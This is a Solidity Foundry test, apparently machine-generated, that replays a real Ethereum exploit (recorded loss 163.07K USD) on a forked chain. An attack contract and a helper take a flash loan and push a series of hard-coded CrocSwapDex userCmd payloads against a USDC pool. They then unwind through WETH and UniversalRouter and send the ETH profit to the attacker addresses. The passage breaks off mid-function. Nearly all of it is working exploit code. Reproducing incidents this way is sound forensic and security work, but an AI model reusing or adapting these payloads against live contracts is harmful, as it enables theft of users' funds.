// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 163.07K USD
// Attacker : 0x0000000000037e625b2502c26029aea237f102af
// Attack Contract : 0x0000000000031245f894ab515b42dc0ce15add0f
// Vulnerable Contract : 0x0000000000031245f894ab515b42dc0ce15add0f
// Attack Tx : 0xb2fc668c42623261074de6fc30d583efede2b0e20d7aded42b7b634f9322ff52
// Block : 25266405
// Chain : Ethereum
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : beneficial_payout_reproduction
// Reproduced Value : 110.69K USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 25266404;
    uint256 constant TX_TIMESTAMP = 1780845995;
    uint256 constant TX_BLOCK_NUMBER = 25266405;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _etchHelpers();
        attack.bindHelper(LumosAddresses.attack_helper);
        _expectOutcome(address(attack), LumosAddresses.attack_helper);
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
        vm.allowCheatcodes(ATTACK_CONTRACT);
    }

    function _etchHelpers() internal {
        vm.etch(LumosAddresses.attack_helper, type(AttackerHelper).runtimeCode);
        vm.allowCheatcodes(LumosAddresses.attack_helper);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.A_000000_394A, address(0), LumosAddresses.ZERO, "ETH", 33925463595158736401);
        _expectProfit(LumosAddresses.A_4838B1_5F97, address(0), LumosAddresses.ZERO, "ETH", 33925463595158736401);
    }
}

contract OurAttack {
    // - role=attacker_entry selector=0x00010000 function_id=0x0000000000031245f894ab515b42dc0ce15add0f|0x00010000|0x00010000|len:15039|input:61e4abe1b7a7b41d|ct:CALL|attacker_entry
    // - role=attacker_callback selector=entry function_id=0x0000000000031245f894ab515b42dc0ce15add0f|entry|entry|len:0|input:a54942c8e365f378|ct:CALL|attacker_callback

    AttackerHelper public helper;

    function attack() external payable {
        _attack();
    }

    function _attack() internal {
        {
            bytes32 observedSalt =
                bytes32(uint256(52197462157089653652062170433574325807818130183495210507384943586355946979328));
            observedSalt;
            address created = LumosAddresses.attack_helper;
            require(created.code.length != 0, "observed helper runtime missing");
        }
        AttackerHelper(payable(LumosAddresses.attack_helper))._helper2();
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(1099511627775)), bytes32(uint256(4294967296)));
        LumosHarness.vmExt().store(LumosAddresses.attack_contract, bytes32(uint256(11)), bytes32(uint256(0)));
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_contract,
                bytes32(uint256(12)),
                bytes32(uint256(917551056842671309452305380979543736893630245704))
            );
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_contract,
                bytes32(uint256(13)),
                bytes32(uint256(1461546239161582346370906367616202923829824460800))
            );
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_contract,
                bytes32(uint256(14)),
                bytes32(uint256(15947517623696179619959689243712783))
            );
        AttackerHelper(payable(LumosAddresses.attack_helper)).helperCb();
        uint256 withdrawAvailableAmount = IERC20Like(LumosAddresses.WETH).balanceOf(address(this)); // natural replay: withdraw only WETH currently held by this replay frame
        if (withdrawAvailableAmount > 33721988711712491517) withdrawAvailableAmount = 33721988711712491517;
        IWETH(LumosAddresses.WETH).withdraw(withdrawAvailableAmount);
        IERC20Like(LumosAddresses.USDC).approve(LumosAddresses.A_000000_8BA3, type(uint256).max);
        IContract_000000_8BA3(LumosAddresses.A_000000_8BA3)
            .approve(
                LumosAddresses.USDC,
                LumosAddresses.UniversalRouter,
                uint160(uint160(0x00ffffffffffffffffffffffffffffffffffffffff)),
                uint48(281474976710655)
            );
        {
            bytes[] memory abiArg1 = new bytes[](2);
            bytes memory executePayload1 =
                hex"00000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000d04b9015f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000002ba0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000064c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000";
            abiArg1[0] = executePayload1;
            bytes memory executePayload2 =
                hex"00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000";
            abiArg1[1] = executePayload2;
            IUniversalRouter(LumosAddresses.UniversalRouter).execute(hex"000c", abiArg1);
        }
        {
            uint256 nativeTransferAmount = address(this).balance;
            if (nativeTransferAmount > 33925463595158736401) nativeTransferAmount = 33925463595158736401;
            (bool ok,) = payable(LumosAddresses.A_4838B1_5F97).call{value: nativeTransferAmount}("");
            if (!ok)
            { /* artifact native transfer used contract receive/fallback context not reproduced by direct empty-call replay */ }
        }
        {
            uint256 nativeTransferAmount = address(this).balance;
            if (nativeTransferAmount > 33925463595158736401) nativeTransferAmount = 33925463595158736401;
            (bool ok,) = payable(LumosAddresses.A_000000_394A).call{value: nativeTransferAmount}("");
            if (!ok)
            { /* artifact native transfer used contract receive/fallback context not reproduced by direct empty-call replay */ }
        }
    }

    function _attack2() internal {
        _markCallback(1);
    }

    receive() external payable {
        if ((address(this) == address(this)
                    && (msg.sender == address(this) || msg.sender == LumosAddresses.UniversalRouter))) _entryCb();
    }

    fallback() external payable {
        if (msg.sig == 0x00010000) {
            _attack();
            bytes memory ret = hex"";
            assembly { return(add(ret, 32), mload(ret)) }
        }
        _entryCb();
    }

    function _entryCb() internal {
        if (
            address(this) == address(this)
                && (msg.sender == address(this) || msg.sender == LumosAddresses.UniversalRouter)
        ) {
            _attack2();
            return;
        }
    }

    function bindHelper(address attackHelper) external {
        helper = AttackerHelper(payable(attackHelper));
    }

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerFlash(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerFlashLoanPreBalances(address[] memory tokens) external {
        _recordBalancerFlash(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }

    function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }

    function _uintArray2(uint256 a0, uint256 a1) internal pure returns (uint256[] memory out) {
        out = new uint256[](2);
        out[0] = a0;
        out[1] = a1;
    }
}

contract AttackerHelper {
    receive() external payable {}

    function receiveFlashLoan(
        address[] calldata arg0,
        uint256[] calldata arg1,
        uint256[] calldata arg2,
        bytes calldata arg3
    ) external payable {
        arg0;
        arg1;
        arg2;
        arg3;
        _flashLoan();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    fallback() external payable {
        if (msg.sig == 0xfca3faa9) {
            _helperCb();
            bytes memory ret = hex"";
            assembly { return(add(ret, 32), mload(ret)) }
        }
        _entryCb();
    }

    function flashLoan() external payable {
        _flashLoan();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function helperCb() external payable {
        _helperCb();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function lumosRepayBalancerVault() external {
        _lumosRepayBalance2(LumosAddresses.USDC, 1);
        _lumosRepayBalance2(LumosAddresses.WETH, 50000000000000000000);
    }

    function lumosRepayBalancerVault(address[] calldata tokens, uint256[] calldata amounts) external {
        for (uint256 i = 0; i < tokens.length && i < amounts.length; i++) {
            _lumosRepayBalance2(tokens[i], amounts[i]);
        }
        _lumosRepayBalance2(LumosAddresses.USDC, 1);
        _lumosRepayBalance2(LumosAddresses.WETH, 50000000000000000000);
    }

    function _lumosRepayBalance2(address token, uint256 amount) internal {
        uint256 remaining = _lumosRepayBalancerT(token, amount, address(this));
        remaining = _lumosRepayBalancerT(token, remaining, LumosAddresses.attack_contract);
        if (remaining == 0) return;
        remaining = _lumosRepayBalancerT(token, remaining, LumosAddresses.attack_helper);
        if (remaining == 0) return;
    }

    function _lumosRepayBalancerT(address token, uint256 amount, address holder) internal returns (uint256) {
        if (amount == 0) return 0;
        uint256 bal = IERC20Like(token).balanceOf(holder);
        if (holder == address(this) && token == LumosAddresses.WETH && bal < amount && address(this).balance > 0) {
            uint256 wrapAmount = address(this).balance < (amount - bal) ? address(this).balance : (amount - bal);
            ILumosWETHLike(token).deposit{value: wrapAmount}();
            bal += wrapAmount;
        }
        if (bal == 0) return amount;
        uint256 sendAmount = bal < amount ? bal : amount;
        if (holder == address(this)) {
            IERC20Like(token).transfer(LumosAddresses.Vault_BA1222, sendAmount);
        } else {
            LumosHarness.vmExt().startPrank(holder);
            IERC20Like(token).transfer(LumosAddresses.Vault_BA1222, sendAmount);
            LumosHarness.vmExt().stopPrank();
        }
        return amount - sendAmount;
    }

    function _entryCb() internal {}

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerFlash(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerFlashLoanPreBalances(address[] memory tokens) external {
        _recordBalancerFlash(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }

    function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }

    function _uintArray2(uint256 a0, uint256 a1) internal pure returns (uint256[] memory out) {
        out = new uint256[](2);
        out[0] = a0;
        out[1] = a1;
    }

    function _flashLoan() internal {
        IERC20Like(LumosAddresses.USDC).approve(LumosAddresses.CrocSwapDex, 0);
        IERC20Like(LumosAddresses.USDC).approve(LumosAddresses.CrocSwapDex, type(uint256).max);
        uint256 withdrawAvailableAmount = IERC20Like(LumosAddresses.WETH).balanceOf(address(this)); // natural replay: withdraw only WETH currently held by this replay frame
        if (withdrawAvailableAmount > 50000000000000000000) withdrawAvailableAmount = 50000000000000000000;
        IWETH(LumosAddresses.WETH).withdraw(withdrawAvailableAmount);
        ICrocQuery(LumosAddresses.CrocQuery).queryPoolParams(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        IERC20Like(LumosAddresses.USDC).balanceOf(LumosAddresses.attack_helper);
        {
            bytes memory userCmdPayload =
                hex"0000000000000000000000000000000000000000000000000000000000000049000000000000000000000000aac14d196a9e27923a92d8e87e3b6a5dcd4fec1b000000000000000000000000000000000000000000000002b5e3af16b18800000000000000000000000000000000000000000000000000000000000000000000";
            ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd{value: 50000000000000000000}(uint16(3), userCmdPayload);
        }
        {
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 userCmdActionGraphAmount = 1; // pseudocode/action-graph priority: arg0=1 follows balance_from edge action_0013 -> action_0018 from LumosAddresses.USDC.balanceOf(address) return=1 with args (0xaac14d196a9e27923a92d8e87e3b6a5dcd4fec1b); do not cap to address(this)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d2a3ca202a16295b7c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(userCmdActionGraphAmount), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000068eff0328d27231873e900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_2 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006d383870f014004cacb300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_2), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_3 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000071ad3d92a2d975480b2e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_3), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_4 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007650d2f841bc8e42091900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_4), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_5 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b24df151d12d09253b300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_5), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_6 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea40000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000802b5c367afc0d731e7600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_6), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_7 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000085665952fac01ac6095700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_7), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_8 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008ad7fae26ec36499098a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_8), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_9 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090827bbe857cc113fb8700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_9), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_10 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000096682e0c9d729ec0058800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_10), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_11 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009c8b7c3124070519e8e500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_11), userCmdPayload);
            }
            ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
            uint16 crocSwapDexUserCmdAmount_12 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
            {
                bytes memory userCmdPayload =
                    hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea40000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a2eee9cce2c27ae2a40000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
                ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_12), userCmdPayload);
            }
        }
        ICrocQuery(LumosAddresses.CrocQuery).queryCurve(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        ICrocQuery(LumosAddresses.CrocQuery).queryLevel(LumosAddresses.ZERO, LumosAddresses.USDC, 420, int24(212784));
        {
            bytes memory userCmdPayload =
                hex"00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a40000000000000000000000000000000000000000000000000000000000033f300000000000000000000000000000000000000000000000000000000000033f5000000000000000000000000000000000000000000000000000000004732618000000000000000000000000000000000000000000000000000000000000010002000000000000000000000000000000000ffff5433e2b3d8211706e6102aa947100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000";
            ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(2), userCmdPayload);
        }
        ICrocQuery(LumosAddresses.CrocQuery).queryLevel(LumosAddresses.ZERO, LumosAddresses.USDC, 420, int24(212784));
